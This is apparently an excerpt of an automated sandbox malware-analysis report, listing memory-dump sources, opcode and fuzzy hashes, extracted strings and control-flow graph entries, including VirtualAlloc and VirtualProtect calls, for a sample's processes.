                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f848aabad815643145f92b6567d040a4bd1dcdce6687ffc341119a42eee812d1
                                                                                                      • Instruction ID: c92f9fdfc5a4d868d9cf87a91ff426084f212d18641e030aa5e3d6a1b17f1b43
                                                                                                      • Opcode Fuzzy Hash: f848aabad815643145f92b6567d040a4bd1dcdce6687ffc341119a42eee812d1
                                                                                                      • Instruction Fuzzy Hash: 3901A874914A4D9FDF84EF68C889AEE7BF0FB68305F00056AA81DD3264DB71E594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8ca000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 33d6917b44f2f6ba1b194412f5e8c0e27d6aa48236c57be537ee9bb0b1b32851
                                                                                                      • Instruction ID: ceeb44e5db9fdbaa2fe74edd32aff732986e9833af4c8dd645d7efd5013336b8
                                                                                                      • Opcode Fuzzy Hash: 33d6917b44f2f6ba1b194412f5e8c0e27d6aa48236c57be537ee9bb0b1b32851
                                                                                                      • Instruction Fuzzy Hash: BB01A870914A4D8FDF84EF58C889AEE7BF0FB68305F10056AA81DD3264DB30A594CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 864e7063ccadf896a52f99d66870bc228077e544bdf499eea83de413e4a2359f
                                                                                                      • Instruction ID: c4e64ca86fb73a8abf4f100b52e6ad2d0b5ad5ffd32487c5193295a81ee6aa14
                                                                                                      • Opcode Fuzzy Hash: 864e7063ccadf896a52f99d66870bc228077e544bdf499eea83de413e4a2359f
                                                                                                      • Instruction Fuzzy Hash: C301AD7091878C8FDB54EF18C8555E93BE1FF28304F4501AAE848C3292D738EA54CB82
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bb00a5e29c09a69d56fb83efe11e07d066260400a161fea0aad07a6c86211598
                                                                                                      • Instruction ID: 51553355d578c8d7133fca7c0c44a28296348ddf6ad5b89be134ee0ea15f0dbf
                                                                                                      • Opcode Fuzzy Hash: bb00a5e29c09a69d56fb83efe11e07d066260400a161fea0aad07a6c86211598
                                                                                                      • Instruction Fuzzy Hash: 57018F3090968C8FCB85DF24C865AD97FB0FF55304F0540DAE408C71A2CB359994CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6cfdc1a11cd0b5d167331578684c21cfab700b0f8efbe0945de679086227aaa2
                                                                                                      • Instruction ID: 1a9f245208318dcb098c4bb469bd9c47088017ecaa1f655e16a1e2fee24877c3
                                                                                                      • Opcode Fuzzy Hash: 6cfdc1a11cd0b5d167331578684c21cfab700b0f8efbe0945de679086227aaa2
                                                                                                      • Instruction Fuzzy Hash: B6014F30A0968C9FCB85DF64C868AA97FF0FF69311F0500DBD449C71A2D7359994CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3492c54f1d62ca7ec85a71d696e4f684057d9d85112218918aee6401771cf4e0
                                                                                                      • Instruction ID: e8dba77aff67d33345f1b8932886a9f3f5bee0d87238dcddb0a8561e142dfce0
                                                                                                      • Opcode Fuzzy Hash: 3492c54f1d62ca7ec85a71d696e4f684057d9d85112218918aee6401771cf4e0
                                                                                                      • Instruction Fuzzy Hash: BA01AF2454E3C95FDB439BB448B85D47FF0AF07204F0A40EBE4C8CA0A3C6288659C712
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction ID: 80033d7110217501d2c5219ec31fb2c9294cd2d12766bb1716a1a0bceb8d751a
                                                                                                      • Opcode Fuzzy Hash: 948ac9d758c6c31c1c27691ebaca5092c2e4de9777b68126395164b8103bb3cd
                                                                                                      • Instruction Fuzzy Hash: B3D05EB5E19B1E9FEBA0DE58409835473A1FF14310F4200BD948893062DF385911DF00
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8C5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8c5000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $%$)$+$`
                                                                                                      • API String ID: 0-1941960537
                                                                                                      • Opcode ID: a8f2f6f5273c2530670f8555fa323d56958ad2b24474c7ab9ab8ddcb7252815d
                                                                                                      • Instruction ID: fde7038374f8658dadeaf5cad069b5ef44a7d32096f5591bdbac845d3f2e88e6
                                                                                                      • Opcode Fuzzy Hash: a8f2f6f5273c2530670f8555fa323d56958ad2b24474c7ab9ab8ddcb7252815d
                                                                                                      • Instruction Fuzzy Hash: A2C1FF70A1952D8FDB65EB64C8A4BE9B3B2FF98304F5045F9C01D97295CE35AA81CF40
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+$E$H$n
                                                                                                      • API String ID: 0-1773399086
                                                                                                      • Opcode ID: b92fa20d0e33e7ee30e494b060d715ba01ea5247e660b250292986b23f006ede
                                                                                                      • Instruction ID: fad5effcc537e4d61301350cd54ba5c28f9190b52e3324ec2bede60a6548f3e4
                                                                                                      • Opcode Fuzzy Hash: b92fa20d0e33e7ee30e494b060d715ba01ea5247e660b250292986b23f006ede
                                                                                                      • Instruction Fuzzy Hash: FD51F970A0962D8FEB64DF54C8547A8B7F2FB98311F1046FAD10D97292CB356E858F41
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000032.00000002.2363114076.00007FFD9B8F7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8F7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_50_2_7ffd9b8f7000_TItoGxsDkTEZBWdlQNGwopi.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$j$u$}
                                                                                                      • API String ID: 0-684171762
                                                                                                      • Opcode ID: 90fa9120faf88389986ca1b88ae63c0967aa7329a4981164fc332c6a114206ae
                                                                                                      • Instruction ID: 34ca5ccaa11eb680f6c219e8c731dc8318f8c0114120c641a44cef2eabc319bc
                                                                                                      • Opcode Fuzzy Hash: 90fa9120faf88389986ca1b88ae63c0967aa7329a4981164fc332c6a114206ae
                                                                                                      • Instruction Fuzzy Hash: 2C113030B0922D8FDB64CF54C9987E9B7F2EF98310F1082A5C10D562A5CB346E85CF81

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.5%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:7
                                                                                                      Total number of Limit Nodes:1
                                                                                                      execution_graph 19406 7ffd9b8a17ce 19407 7ffd9b8a17dd VirtualProtect 19406->19407 19409 7ffd9b8a191d 19407->19409 19410 7ffd9b8a31bd 19411 7ffd9b8a3171 19410->19411 19412 7ffd9b8a31db VirtualAlloc 19410->19412 19414 7ffd9b8a32f5 19412->19414
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8aa000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: qL_H
                                                                                                      • API String ID: 0-3462653048
                                                                                                      • Opcode ID: 8af6ad81cd494e00dd686fdb93b0a2ea1ce092c94b905353a75867cbafbf9791
                                                                                                      • Instruction ID: 9639991461e7b923bb8a772302fa4bd2a6cef4cc2c05bb7bc3d0268386b9cf67
                                                                                                      • Opcode Fuzzy Hash: 8af6ad81cd494e00dd686fdb93b0a2ea1ce092c94b905353a75867cbafbf9791
                                                                                                      • Instruction Fuzzy Hash: 8043FC70E0995D8FDBA8EB58C8A5BA9B7B1FF58300F1442E9D00DD3296DA356E81CF50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: f93b8383cad2bf71d6c53e5ccc60a2bc39152d11b59a23e32e931b7b8f980913
                                                                                                      • Instruction ID: c74a1b2d8420a222af52bb0ca041d4c53c15da5ef9835f28172fcca366aa8b51
                                                                                                      • Opcode Fuzzy Hash: f93b8383cad2bf71d6c53e5ccc60a2bc39152d11b59a23e32e931b7b8f980913
                                                                                                      • Instruction Fuzzy Hash: 26A29470E09A1D8FDFA9DF58C895BA8BBB1FF59304F1041A9D01DE7265DA34AA81CF00

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 1(x
                                                                                                      • API String ID: 0-3237925078
                                                                                                      • Opcode ID: 3c31fd111ae200df23ac94c9406feddbc0544f0cb7668a7422b3148fab796af1
                                                                                                      • Instruction ID: e26107d2885cdce4e7fab801f46264d704dd0565b5a29f99b1995e7664c07314
                                                                                                      • Opcode Fuzzy Hash: 3c31fd111ae200df23ac94c9406feddbc0544f0cb7668a7422b3148fab796af1
                                                                                                      • Instruction Fuzzy Hash: 7C221970E0461D8FDB58DFA8C495AEDBBF1FF88300F14866AD419EB256DA34A981CF50

                                                                                                      Control-flow Graph

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: @
                                                                                                      • API String ID: 0-2766056989
                                                                                                      • Opcode ID: 6fd3507669cfe1205758f329203574e5925d9c6a87509aa9b866f77b8998a79b
                                                                                                      • Instruction ID: 6c8232963f899aca08c936021de4d823757f5d8f56f4360704cea8fbb59a29fa
                                                                                                      • Opcode Fuzzy Hash: 6fd3507669cfe1205758f329203574e5925d9c6a87509aa9b866f77b8998a79b
                                                                                                      • Instruction Fuzzy Hash: 37F1DB70E1965D8FDBA8EB58C8A5BA8B7F1FF58300F1541BAD40DD72A1DB746A80CB40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83cba7eb26993aa3ba5471442fbe7b1fd51d1772b635ee0e385ec257dcf5dbab
                                                                                                      • Instruction ID: 131a27fdcdb5cd95db0c95138963aaedf03bc30319fd3f73c5d822c409a17696
                                                                                                      • Opcode Fuzzy Hash: 83cba7eb26993aa3ba5471442fbe7b1fd51d1772b635ee0e385ec257dcf5dbab
                                                                                                      • Instruction Fuzzy Hash: 96A1D1B1A18A4D8FE798EB6CD8657A9BFE1FF59310F4001BED049D32E6DB7828418741

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 480 7ffd9b8a5f66-7ffd9b8a5f99 482 7ffd9b8a5fa3-7ffd9b8a5fbb 480->482 483 7ffd9b8a5fc6-7ffd9b8a5fcd 482->483 484 7ffd9b8a5fed-7ffd9b8a6783 483->484 485 7ffd9b8a5fcf-7ffd9b8a66d7 483->485 484->483 485->483 492 7ffd9b8a66dd-7ffd9b8a66e7 485->492 492->483
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: +$pQ_H
                                                                                                      • API String ID: 0-2878190000
                                                                                                      • Opcode ID: 97a6a9b893856734b7e6e931502e15d25bba9b0c27a80de55de87967e49dd7d8
                                                                                                      • Instruction ID: 961c4ff1ac43a72e52fddb60d42a5336ad17c90a4840ea2a67d468439db47fab
                                                                                                      • Opcode Fuzzy Hash: 97a6a9b893856734b7e6e931502e15d25bba9b0c27a80de55de87967e49dd7d8
                                                                                                      • Instruction Fuzzy Hash: EB11E974A0A61D8BDBA4DB58C9A47E8B7B1EB4C300F1141A9E40EE7295CE386B81CB40

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 493 7ffd9b89ae5e-7ffd9b89ae72 494 7ffd9b89ae7c-7ffd9b89ae89 493->494 495 7ffd9b898ba8-7ffd9b898bfd 494->495 496 7ffd9b89ae8f-7ffd9b89aebf 494->496
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B896000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B896000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b896000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$)
                                                                                                      • API String ID: 0-2010264150

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 697 7ffd9b8a17ce-7ffd9b8a17db 698 7ffd9b8a17e6-7ffd9b8a17f7 697->698 699 7ffd9b8a17dd-7ffd9b8a17e5 697->699 700 7ffd9b8a17f9-7ffd9b8a1801 698->700 701 7ffd9b8a1802-7ffd9b8a191b VirtualProtect 698->701 699->698 700->701 706 7ffd9b8a191d 701->706 707 7ffd9b8a1923-7ffd9b8a1973 701->707 706->707
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a1000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 794 7ffd9b8a31bd-7ffd9b8a31d9 795 7ffd9b8a31db-7ffd9b8a32f3 VirtualAlloc 794->795 796 7ffd9b8a3171-7ffd9b8a31ba 794->796 802 7ffd9b8a32f5 795->802 803 7ffd9b8a32fb-7ffd9b8a335f 795->803 802->803
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a1000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 806 7ffd9b8e11d8-7ffd9b8e122e
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2I_^
                                                                                                      • API String ID: 0-3051185169

                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fe757176af999effbaaa2ca9fabc363eaaaf029ecc553428c9bdb23dfce830b4
                                                                                                      • Instruction ID: d2ac9f096e12720d48aeca8e02669c1d4c72ee62e0b594d859e0757b14527dc9
                                                                                                      • Opcode Fuzzy Hash: fe757176af999effbaaa2ca9fabc363eaaaf029ecc553428c9bdb23dfce830b4
                                                                                                      • Instruction Fuzzy Hash: E2110831B1E69E8FEB129BA8CC212E97B70EF46714F064573D054DB1E2DA38660A8791
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83bc141713749c2925e473006273c74ad905417ac7ace816d4fbe688743cf7f8
                                                                                                      • Instruction ID: 1af07dc9a93a0184cc0385206813c3ee8144a89f6219443c62b970a5b02131ba
                                                                                                      • Opcode Fuzzy Hash: 83bc141713749c2925e473006273c74ad905417ac7ace816d4fbe688743cf7f8
                                                                                                      • Instruction Fuzzy Hash: 13119A30A09A1D8FDFA9DB58C895AA8B7B5FF58301F5141E9E00DE7691CB31AE81CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa47ed7fef2a9d9f400c17042f6106bcb56050dfaccf7207873ed05c136c5a01
                                                                                                      • Instruction ID: a53f67e38458c4522f17a141e878cfe67da901fa9a8afd30da53fa4edd7a2035
                                                                                                      • Opcode Fuzzy Hash: fa47ed7fef2a9d9f400c17042f6106bcb56050dfaccf7207873ed05c136c5a01
                                                                                                      • Instruction Fuzzy Hash: 66110631E1E69E8FEB129BA4CC252E97B70EF46714F0645B3D061DB2E2CA386609C751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05c7e1c3306b283a7c10560364e5bbe022ae47e523faf213ceddecb7c4f51900
                                                                                                      • Instruction ID: 1b7da776573538764a2ad90f61ca58d09af6ab20d8f2fa5a1fc046fe810dc3f3
                                                                                                      • Opcode Fuzzy Hash: 05c7e1c3306b283a7c10560364e5bbe022ae47e523faf213ceddecb7c4f51900
                                                                                                      • Instruction Fuzzy Hash: CF21BB30A09A1D8FCFA9DB18C895AA8B7B5FF58301F5141E9E00DD76A1CB30AA81CF40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bb50811943ed3a62e08eb6484710ff9a0a1e15075d91cd3ddaa67368b2c25d1
                                                                                                      • Instruction ID: 9de1c39706fa865e7b39fd9f712dcbb92a58626c7eaea98df1ad3081ac59b383
                                                                                                      • Opcode Fuzzy Hash: 3bb50811943ed3a62e08eb6484710ff9a0a1e15075d91cd3ddaa67368b2c25d1
                                                                                                      • Instruction Fuzzy Hash: 15114631E0D51DCBDB28FB98E8A85ECB7B1FF58315F11467AC01A932A2DF7469428B40
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6c57de5bed07e70911e0b2c2cdefbfcde18382b4ed689773f4c6a8b1866d7ece
                                                                                                      • Instruction ID: 4f70b75c0d89fe198f8257219209319a733d8351ef447cdc0786f7695efb8d7f
                                                                                                      • Opcode Fuzzy Hash: 6c57de5bed07e70911e0b2c2cdefbfcde18382b4ed689773f4c6a8b1866d7ece
                                                                                                      • Instruction Fuzzy Hash: 37016D31E0E50D4FE7119B54D8212FDBBB4EF8A314F420172E008D22D6DE385105C792
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 769019c807e60a13679326cca080a67dcdcb31c62df7c0d9fec6c07c532a7fdc
                                                                                                      • Instruction ID: ba538e2d9e47ab0e2c0407c22df4139efa9036146999ccfadbb4a8e2147422db
                                                                                                      • Opcode Fuzzy Hash: 769019c807e60a13679326cca080a67dcdcb31c62df7c0d9fec6c07c532a7fdc
                                                                                                      • Instruction Fuzzy Hash: 40115A70908A8D8FDF85EF68C899AE97BF0FF28301F0101AAD819D3161DB349584CB80
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 168889cc31e01747f7430c8778f5a4d37fda9759d85e58abcf7bf9327c5c4f63
                                                                                                      • Instruction ID: 8ed8e14fbb526d422b35fbe89be87facd79ab1e7fd631d1e6efe2811ff664f1d
                                                                                                      • Opcode Fuzzy Hash: 168889cc31e01747f7430c8778f5a4d37fda9759d85e58abcf7bf9327c5c4f63
                                                                                                      • Instruction Fuzzy Hash: F911E131E0E29E8FEB129BA4CC252A97B70EF46704F0645B3D061DB2E6DA386609C751
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 952325ce522164b20fc017bdb09222fe28f3d586e0d190c4997b992c808d7cf9
                                                                                                      • Instruction ID: a4d5940bd9f5230712bf71fb79fdfcd10eb5364a45d0fb9bae47919a1e2d6d49
                                                                                                      • Opcode Fuzzy Hash: 952325ce522164b20fc017bdb09222fe28f3d586e0d190c4997b992c808d7cf9
                                                                                                      • Instruction Fuzzy Hash: 1B015634A1968DCFCB95EF18C891AD93BF0FF18304F0601AAE848C7261D774E960CB81
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 703ac6e322d3fbef8415fefbd4b8ad18c6afdbd4c146b8e43a781989145aac37
                                                                                                      • Instruction ID: a99ae915b0229f6a6bbec878e8aa5c81feeee85099718937e44acf35369314ee
                                                                                                      • Opcode Fuzzy Hash: 703ac6e322d3fbef8415fefbd4b8ad18c6afdbd4c146b8e43a781989145aac37
                                                                                                      • Instruction Fuzzy Hash: E6111E3090864D8FCF85EF68C859AEA7BF0FF69304F0105ABE459D7161D7349554CB41
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8bf418eeab8bf32c64110ade5bf008c09aa93fb4c3950c2cc2ea13a7c35d5911
                                                                                                      • Instruction ID: bc2f9cc172d44955d483e9d4e0f1a2d520790a95162b5312ab5dfe657a60922a
